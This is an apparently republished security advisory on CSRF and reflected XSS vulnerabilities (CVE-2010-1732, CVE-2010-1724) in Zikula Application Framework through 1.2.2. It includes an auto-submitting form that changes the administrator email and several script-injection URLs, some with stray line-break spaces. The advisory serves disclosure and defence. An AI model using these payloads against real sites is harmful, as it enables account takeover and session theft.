High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Zikula Application Framework, which can be exploited to perform cross-site scripting (XSS) and cross-site request forgery (CSRF) attacks.
XSRF (CSRF) in Zikula Application Framework: CVE-2010-1732
The vulnerability exists due to insufficient validation of the request origin. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change the administrators email address. Successful exploitation may result in complete control of the application but requires users
interaction.
Exploitation example:
<form method=“POST”
action=“http://host/index.php?module=users&func=updateemail” name=“main”>
<input type=“hidden” name=“newemail” value="[email protected]">
<input type=“hidden” name=“submit” value=“”>
</form>
<script>
document.main.submit();
</script>
Multiple XSS (Cross Site Scripting) vulnerabilities in Zikula Application Framework: CVE-2010-1724
2.1 The vulnerability exists due to input validation error in the “lang” variable in ZLanguage.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and scripting code in user`s browser in context of the vulnerable website.
Exploitation examples:
http://host/?lang=en’"><img src=0 onerror=alert(document.cooki e%29%3E
http://host/index.php?module=adminpanel&type=admin&func=adminpane l&lang=en%27%22%3E%3Cimg%20src=0%20onerror=alert%28document.cookie%29%3E
2.2 Input validation error exists in the “func” variable in index.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and scripting code in user`s browser in context of the vulnerable website.
Exploitation examples:
http://host/index.php?module=tour&func=exttour’"><script>alert(2 34%29%3C/script%3E
http://host/index.php?module=search&func=recent’"% 3E%3Cimg%20src=0%20onerror=alert%28document.cookie%29%3E
CPE | Name | Operator | Version |
---|---|---|---|
zikula application framework | le | 1.2.2 |